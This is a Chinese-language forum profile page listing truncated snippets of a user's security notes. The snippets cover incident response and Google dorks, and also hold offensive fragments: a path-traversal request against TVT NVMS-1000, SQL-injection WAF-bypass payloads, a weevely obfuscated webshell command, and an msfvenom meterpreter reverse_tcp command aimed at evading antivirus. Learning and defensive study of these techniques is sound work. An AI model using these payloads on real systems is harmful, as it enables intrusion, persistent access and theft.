首页
签到
搜索
登录
个人资料
论坛帖子
不值得
个人资料
论坛帖子
主题
帖子
不值得
2022-12-31
0
安卓常见测试项
Android 开发的四大组件分别是:活动(activity),用于表现功能;服务(service),后台运行服务,不提供界面呈现;广播接受者(Broadcast Receive),勇于接收广播;内容
2022-12-31
不值得
2021-10-4
0
TVT数码科技 NVMS-1000 路径遍历漏洞
fofa
app="TVT-NVMS-1000"
发送请求包读取文件
GET /../../../../../../../../../../../../windows/win.in
2021-10-4
不值得
2021-7-25
2
md5解密网站
国内Md5解密: http://t007.cn/
https://cmd5.la/
https://cmd5.com/
https://pmd5.com/
http://ttmd5.com/
http
2021-7-25
不值得
2021-5-14
0
cve2021-1732windows本地提权复现
https://github.com/Ascotbe/Kernelhub
CVE-2021-1732: 权限提升
漏洞发生在Windows图形驱动win32kfull!NtUserCreateWind
2021-5-14
不值得
2021-5-13
1
大型企业渗透技巧
企业常见安全问题
cms,框架过时
验证码问题,不加验证码
弱口令初始密码
大量告警,误报很多,工作量大,对入侵方式难以确认
第三方拒绝服务:企业系统调用第三方厂商接口,扫描器加载payload,触发
2021-5-13
不值得
2021-3-28
0
应急响应
1,检查系统账号安全
弱口令,lusrmgr.msc,注册表,日志管理员登陆时间,eventvwr.msc
2,检查异常端口,进程
端口连接情况,netstat -ano,tasklist |find
2021-3-28
不值得
2021-2-14
0
应急响应windows
应急响应基本流程
收集信息:收集客户信息和中毒主机信息,包括样本
判断类型:判断是否是安全事件,何种安全事件,勒索,挖矿,断网,dos等等
深入分析:日志分析,进程分析,启动项分析,样本分析
清理处置
2021-2-14
不值得
2020-12-10
1
提权
通常脚本所处的权限
asp/php匿名权限
aspx user权限
jsp通常是系统权限
脚本主要看容器的权限
收集信息
内网外网
服务器系统版本位数
服务器的补丁情况
服务器安装的软件情况
服务器的
2020-12-10
不值得
2020-11-9
0
sql注入绕过
整数溢出报错函数
and cot(0)
and pow(988888,999999)
and exp(710)
利用几何函数进行报错注入
and polygon(user)
and linestrin
2020-11-9
不值得
2020-10-20
0
sql注入绕过waf
id=1 union /!10044select 1,2,3 -- sf/%0afrom admin limit 1,1%23/
=>select 1,2,3 from admin limit
2020-10-20
不值得
2020-9-6
0
weevely getshell
weevely url password
生成混淆shell
weevely generate -obfuscator cleartext1_php password 文件名
obfusc1_php
2020-9-6
不值得
2020-8-30
0
msf免杀
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=ip LPORT=端口 -f raw -e x8
2020-8-30
不值得
2020-8-5
3
谷歌语法
“”双引号内的内容不可以拆分
site指定域名
inurl存在关键字的网页url
filetype指定文件类型
intext网页正文中的关键字
intitle网页标题中的关键字
link link:
2020-8-5
不值得
2020-5-23
0
xss
构造xss脚本
常用html标签
<iframe>创建包含另一个文档的内联框架(行内框架)
<textarea>定义多行的文本输入控件
<img>嵌入一幅图像
&l
2020-5-23